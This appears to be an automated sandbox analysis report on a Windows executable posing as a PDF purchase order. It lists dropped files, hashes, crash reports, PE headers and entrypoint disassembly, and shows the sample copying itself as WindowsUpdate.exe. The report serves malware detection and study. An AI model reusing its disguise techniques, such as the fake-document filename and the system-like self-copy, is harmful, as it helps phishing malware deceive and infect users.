                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.5.5.6.7.6.9.7.8.2.0.1.6.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.5.5.6.7.6.9.8.2.1.0.7.9.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.5.4.d.f.8.f.d.-.5.6.f.9.-.4.a.c.c.-.b.0.3.f.-.6.e.1.7.2.3.3.4.6.6.3.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.6.4.-.0.0.0.1.-.0.0.1.7.-.a.1.1.e.-.0.1.9.3.a.f.e.e.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.c.5.e.b.d.5.8.d.1.9.3.3.b.e.2.9.b.8.8.7.2.0.2.0.b.9.e.c.0.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.2.2.d.5.f.b.0.f.0.7.6.a.0.d.9.4.5.5.9.6.b.7.9.3.8.e.7.2.b.6.b.5.c.a.e.7.3.6.7.4.!.P.O. .2.0.1.0.0.2.9._.p.d.f. . . . .Q.u.o.t.a.t.i.o.n. . .f.r.o.m. .A.l.i.b.a.b.a. .A.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.1././.1.8.:.2.0.:.2.8.:.2.0.!.0.!.P.O. .2.0.1.0.0.2.9._.p.d.f. . . . .Q.u.o.t.a.t.i.o.
                                                C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_PO 2010029_pdf _72613674f79bb87c1b11e7d393fe053666d79f1_6467c67c_1726352a\Report.wer
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):19162
                                                Entropy (8bit):3.773653319477634
                                                Encrypted:false
                                                SSDEEP:192:d3q5vWeHBUZMXj03jZIhy9UcJN5X5Q17zvMvkvDKGwNYeSTs/u7sES274ItihBG:opBUZMX4jzqv3vOS4/u7sEX4ItEG
                                                MD5:794BD95DB4ACDF7A0AB11BA3AB6CA638
                                                SHA1:081C01144CD21C704C0B0138BC64D81AE3B70B64
                                                SHA-256:4F64768EAF8E951A12B5269ECC5F3D26D228131F504700375153376BB14C3571
                                                SHA-512:13F3123264DCA07F3DB79D69408444CD823287AF8CA1EF6E0C72AFCF4391B951C462491E21FEAB3C48747BA92B2DE11BF89EEE1977F09A6E9F20BF4A9B910AA9
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.5.5.6.7.7.0.3.7.4.2.0.2.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.5.5.6.7.7.0.9.7.4.2.0.1.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.6.c.c.a.1.2.4.-.a.5.b.c.-.4.e.3.9.-.b.c.e.f.-.4.a.f.5.5.e.0.8.7.f.7.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.d.9.9.5.c.c.-.5.c.7.5.-.4.c.6.9.-.9.3.6.0.-.7.4.6.b.6.9.5.4.3.b.6.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.O. .2.0.1.0.0.2.9._.p.d.f. . . . .Q.u.o.t.a.t.i.o.n. . .f.r.o.m. .A.l.i.b.a.b.a. .A.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.6.4.-.0.0.0.1.-.0.0.1.7.-.a.1.1.e.-.0.1.9.3.a.f.e.e.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.c.5.e.b.d.5.8.d.1.9.3.3.b.e.2.9.b.8.8.7.2.0.2.0.b.9.e.c.0.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.2.2.d.5.f.b.0.f.0.7.6.a.0.d.9.4.5.5.9.6.b.7.9.3.8.e.7.2.
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB95.tmp.WERInternalMetadata.xml
                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):7786
                                                Entropy (8bit):3.712017053076674
                                                Encrypted:false
                                                SSDEEP:192:Rrl7r3GLNihCx6yo6YSBmSUDMvgmfZ4OQSkCp1Lng1f45m:RrlsNiy6yo6YlSUDMvgmfGOQSNLnqfr
                                                MD5:84CEF630CF0681BFAFF5795DCD1DD9BF
                                                SHA1:20DAFD24F4C7DAF6F9E08DFB388E77B66F11C49B
                                                SHA-256:343A0751D0B019585B5A655031941A406CBF403CDDF33498853B1536B7B287D9
                                                SHA-512:15273848255FFACC787D724ADD047C34B1B0BEFE0BB86983E397E0B8E26676BD54046D8D8A5516D3ADC1195D4B528BBDD0A93D8FB7A18A182567A730E36F3149
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.4.8.<./.P.i.d.>.......
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC61.tmp.xml
                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4727
                                                Entropy (8bit):4.5249078201260895
                                                Encrypted:false
                                                SSDEEP:48:cvIwSD8zsiJgtWI99NeyWSC8B58/8fm8M4JFKnEFK+q8vIMpyzpz43d:uITfwaQTSNX8kJFKvK7pMBGd
                                                MD5:A77D974765EA039F1262BFEFC930DDD0
                                                SHA1:BD9A0C9A7E2125EC668643A67C1DE5AB7053BEE9
                                                SHA-256:EBE9C543D0C54888E69F73621631DF24BCF7996158CC4F69805CB448B11CF2EF
                                                SHA-512:3BCC218C23C2DC2E44752FA14AC1FA69DB851ABD518D3A3D0AE43FFB3B4563C39273E7FC4C473ECB3DC85CA505A18F61F7489744E541C6AE8D513ECF9BB6F5C0
                                                Malicious:false
                                                Reputation:low
                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="824118" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERD288.tmp.mdmp
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Jan 19 22:08:25 2021, 0x60521 type
                                                Category:dropped
                                                Size (bytes):6933739
                                                Entropy (8bit):4.734653460543801
                                                Encrypted:false
                                                SSDEEP:98304:QaMVHrkZq8y7Lb1XaMynrEh+9Hqt+G/haJIy0c83ruYGvkKPTIs:fMVQZN8EnrEh+9HxIqRkKUs
                                                MD5:0FFA20CF1EEC67FD898D3AC64D6C7231
                                                SHA1:8C3CF535A2A1CB827A54C03E639186B21075957A
                                                SHA-256:1646FD0EA566759E195DE0B910D4C301D02FD7D8B9BDE02629FA575AA885DD11
                                                SHA-512:95EE59C890A3C14B7A3DE35A984495ACEB0D859BB7F63BF5860D9CD5382A3BE7787056C79BBA6D2DDF29B77E559248C36006829E4FEBEDB46ABFEE45B64F7551
                                                Malicious:false
                                                Reputation:low
                                                Preview: MDMP....... .......YX.`!..................U...........B.......7......GenuineIntelW...........T.......d...JX.`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0D1.tmp.WERInternalMetadata.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8524
                                                Entropy (8bit):3.7080535077803924
                                                Encrypted:false
                                                SSDEEP:192:Rrl7r3GLNihCRl656YShSUvThRgmfVTSTCprs89bPnosftFm:RrlsNio656YUSUvThRgmfBSCPnbfu
                                                MD5:9FB20031D8273F271E0B02DC2888B81C
                                                SHA1:6C03A55C542379A201F850452865CD8F567A0890
                                                SHA-256:5B1B04CE45984D2003633B3BFD590A9331B4A5AC320A5503CD7CCA1AFFDE54F6
                                                SHA-512:4994B1FA03EDAB8B6DA865A1BB741A6E8868542289F737210B4797FC188CFE1D0BEC636E20296971C3526760BDB864350D35DD2047F15E360F1FB066B891596D
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.4.8.<./.P.i.d.>.......
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERE1CC.tmp.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4777
                                                Entropy (8bit):4.5195633541037825
                                                Encrypted:false
                                                SSDEEP:48:cvIwSD8zspJgtWI99NeyWSC8BB8fm8M4JwO5mEZFJV+q8GqUlpyzpz4Ed:uITf7aQTSNkJwktVJlpMBVd
                                                MD5:8EDDFB7B4C01B2217653133720FB0C3E
                                                SHA1:EE64A9AD9FA38CD71213C86424622FFAC7D57030
                                                SHA-256:684425CEB1CC7C1C95D447C778B60281477DD85DC2083EA402C13C61E74498B2
                                                SHA-512:40C7AA1A2B7B031FE823E3D4619D87F05A7B7B96981B46716DC113A194668A1B1212500D6C1FB5E087DAFBC0800517A53E017FF0B6BDD3BCF014A57F89A7E531
                                                Malicious:false
                                                Reputation:low
                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="824119" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\WindowsUpdate.exe.log
                                                Process:C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):916
                                                Entropy (8bit):5.282390836641403
                                                Encrypted:false
                                                SSDEEP:24:MLF20NaL3z2p29hJ5g522rW2xAi3AP26K95rKoO2+g2+:MwLLD2Y9h3go2rxxAcAO6ox+g2+
                                                MD5:5AD8E7ABEADADAC4CE06FF693476581A
                                                SHA1:81E42A97BBE3D7DE8B1E8B54C2B03C48594D761E
                                                SHA-256:BAA1A28262BA27D51C3A1FA7FB0811AD1128297ABB2EDCCC785DC52667D2A6FD
                                                SHA-512:7793E78E84AD36CE65B5B1C015364E340FB9110FAF199BC0234108CE9BCB1AEDACBD25C6A012AC99740E08BEA5E5C373A88E553E47016304D8AE6AEEAB58EBFF
                                                Malicious:true
                                                Reputation:moderate, very likely benign file
                                                Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\35774dc3cd31b4550ab06c3354cf4ba5\System.Runtime.Remoting.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\de460308a9099237864d2ec2328fc958\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\527c933194f3a99a816d83c619a3e1d3\System.Xml.ni.dll",0..
                                                C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:Qn:Qn
                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                Malicious:false
                                                Preview: ..
                                                C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                Process:C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1074688
                                                Entropy (8bit):7.570804768501044
                                                Encrypted:false
                                                SSDEEP:12288:f8WvAMYGY5RFNBeU7vgTOzcdCeddAAU8f9MkdPUBphp5wvvXLlweomEL+wif7APY:f8W4T17vgKzYXAm+DfuTXomAuzABdpu
                                                MD5:EB59D99961C7636B4872E389DA03CBC9
                                                SHA1:22D5FB0F076A0D945596B7938E72B6B5CAE73674
                                                SHA-256:4DD89AEA31CFB64C8FA6B542C9AD002E4041EF5249F2072947DF749E00E7FD9E
                                                SHA-512:6D062B65284DF0F4CE5845B8730AC6ADF46759AF5F35E3BDE86A609BCE9FF0D5846FBE2D30864E411B695D774B6F6903D558E42F067C44817E3421CD5D41B256
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 37%
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8...|..|..|.....v............n..._#......o....a.....n.....m..|.......}.....}....}..Rich|..........PE..L...d..`..........................................@..........................`............@..................................F.......... ....................0..<,...6..............................06..@...............`............................text...:........................... ..`.rdata..............................@..@.data...4....`.......B..............@....gfids..t............N..............@..@.rsrc... ............P..............@..@.reloc..<,...0......................@..B................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Roaming\WindowsUpdate.exe:Zone.Identifier
                                                Process:C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview: [ZoneTransfer]....ZoneId=0
                                                C:\Users\user\AppData\Roaming\pid.txt
                                                Process:C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):4
                                                Entropy (8bit):2.0
                                                Encrypted:false
                                                SSDEEP:3:Q:Q
                                                MD5:E21E4E58AD9AB56E8A4634046DA90113
                                                SHA1:D7C1F0DD609C0024D00C7EB35743BCC476459876
                                                SHA-256:2C6499976963E9832529BC8D9DFF516D16C13D372D852D1500F5892E46A25507
                                                SHA-512:0A18737EFF8DEE2E701D7F75B10A56E5610AC75D379E0D4D5528ADADE8D7367618FAFDFEB9F16B66C36DAF4A152D96DCFE9E0B5B47A4CEBB6FDAD6A19FDB9134
                                                Malicious:false
                                                Preview: 2148
                                                C:\Users\user\AppData\Roaming\pidloc.txt
                                                Process:C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):72
                                                Entropy (8bit):4.792723397330207
                                                Encrypted:false
                                                SSDEEP:3:oNWXp5v1qOL/kiRMQFLTzxl0C:oNWXpFgOLHXLvxl0C
                                                MD5:C2645D3F71F5EA8326BA0B900632630D
                                                SHA1:0456DB88ECD2D46E89CDCFD159029FA44E10B928
                                                SHA-256:92283FB25F70604C5445F52AD17CFC2E7F206C63D5F737B8A81F12F1FC73BB19
                                                SHA-512:0DBE031016D3A882000116A853F4D8FC463AF466948781AE816349878577B4C67ADE9AA0F96D2B0C7E513C3D8536E0D46CD63B417F802E7E01CA064426823881
                                                Malicious:false
                                                Preview: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.570804768501044
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                File size:1074688
                                                MD5:eb59d99961c7636b4872e389da03cbc9
                                                SHA1:22d5fb0f076a0d945596b7938e72b6b5cae73674
                                                SHA256:4dd89aea31cfb64c8fa6b542c9ad002e4041ef5249f2072947df749e00e7fd9e
                                                SHA512:6d062b65284df0f4ce5845b8730ac6adf46759af5f35e3bde86a609bce9ff0d5846fbe2d30864e411b695d774b6f6903d558e42f067c44817e3421cd5d41b256
                                                SSDEEP:12288:f8WvAMYGY5RFNBeU7vgTOzcdCeddAAU8f9MkdPUBphp5wvvXLlweomEL+wif7APY:f8W4T17vgKzYXAm+DfuTXomAuzABdpu
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8...|...|...|.......v...............n...._#.........o.......a.......n.......m...|...........}.......}.......}...Rich|..........

                                                File Icon

                                                Icon Hash:6eecccccd6d2f2f2

                                                Static PE Info

                                                General

                                                Entrypoint:0x401308
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0x6005EF64 [Mon Jan 18 20:28:20 2021 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:6
                                                OS Version Minor:0
                                                File Version Major:6
                                                File Version Minor:0
                                                Subsystem Version Major:6
                                                Subsystem Version Minor:0
                                                Import Hash:3f85ebb67bac58f72de974a91d40889a

                                                Entrypoint Preview

                                                Instruction
                                                call 00007FA3F8CD8798h
                                                jmp 00007FA3F8CD8255h
                                                push 00000014h
                                                push 00453B58h
                                                call 00007FA3F8CD8AE7h
                                                push 00000001h
                                                call 00007FA3F8CD8560h
                                                pop ecx
                                                test al, al
                                                jne 00007FA3F8CD8259h
                                                push 00000007h
                                                call 00007FA3F8CD8887h
                                                xor bl, bl
                                                mov byte ptr [ebp-19h], bl
                                                and dword ptr [ebp-04h], 00000000h
                                                call 00007FA3F8CD8449h
                                                mov byte ptr [ebp-24h], al
                                                mov eax, dword ptr [00456A80h]
                                                xor ecx, ecx
                                                inc ecx
                                                cmp eax, ecx
                                                je 00007FA3F8CD822Eh
                                                test eax, eax
                                                jne 00007FA3F8CD829Bh
                                                mov dword ptr [00456A80h], ecx
                                                push 0044B290h
                                                push 0044B270h
                                                call 00007FA3F8CF96BFh
                                                pop ecx
                                                pop ecx
                                                test eax, eax
                                                je 00007FA3F8CD8263h
                                                mov dword ptr [ebp-04h], FFFFFFFEh
                                                mov eax, 000000FFh
                                                jmp 00007FA3F8CD834Bh
                                                push 0044B26Ch
                                                push 0044B264h
                                                call 00007FA3F8CF963Dh
                                                pop ecx
                                                pop ecx
                                                mov dword ptr [00456A80h], 00000002h
                                                jmp 00007FA3F8CD8257h
                                                mov bl, cl
                                                mov byte ptr [ebp-19h], bl
                                                push dword ptr [ebp-24h]
                                                call 00007FA3F8CD8637h
                                                pop ecx
                                                call 00007FA3F8CD87FEh
                                                mov esi, eax
                                                xor edi, edi
                                                cmp dword ptr [esi], edi
                                                je 00007FA3F8CD826Ch
                                                push esi
                                                call 00007FA3F8CD8599h
                                                pop ecx
                                                test al, al
                                                je 00007FA3F8CD8261h
                                                push edi
                                                push 00000002h
                                                push edi
                                                mov esi, dword ptr [esi]
                                                mov ecx, esi
                                                call 00007FA3F8CD8A27h
                                                call esi

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x546dc0xb4.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x590000x19f20.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x730000x2c3c.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x536100x1c.rdata
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x536300x40.rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x4b0000x260.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x4993a0x49a00False0.472009629669data6.6152740435IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rdata0x4b0000xa3aa0xa400False0.45107660061SysEx File - Mesosha5.23997613425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x560000x1f340xc00False0.171549479167DOS executable (block device driver \277DN)2.22955442271IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .gfids0x580000x1740x200False0.341796875data2.11448669888IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc0x590000x19f200x1a000False0.195575420673data4.62816449784IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x730000x2c3c0x2e00False0.783882472826data6.63145431335IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x591c00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                RT_ICON0x5b7680x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                RT_ICON0x5c8100x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                RT_ICON0x5cc780x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                RT_ICON0x60ea00x10828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                RT_RCDATA0x717180x1805dataEnglishUnited States
